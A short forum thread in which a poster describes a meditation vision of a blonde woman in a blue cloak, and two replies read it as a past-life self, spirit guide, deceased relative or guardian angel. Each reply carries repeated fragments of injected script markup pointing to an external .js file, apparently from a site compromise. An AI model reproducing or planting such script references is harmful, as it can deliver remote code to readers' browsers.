Meditaton

during my first attempt at meditation i saw lots of butterflies and a woman with blone curly hair and a doll like face she appeared to be wearing a blue cloak also i felt like i should know her does anyone have any input on their interpretation of what i saw

lots of times with meditation you can sometimes see pictures of your past life so my guess is she is you from a past life u can learn a lot from people you see when you meditate sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

It may be a part of your past life but it also could be something else. Sometimes spirits appear to us and try to make contact when we meditate. She could be a deceased realitive of yours or she could be your spirit guide or even your gueardian angel if you believe in such things. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
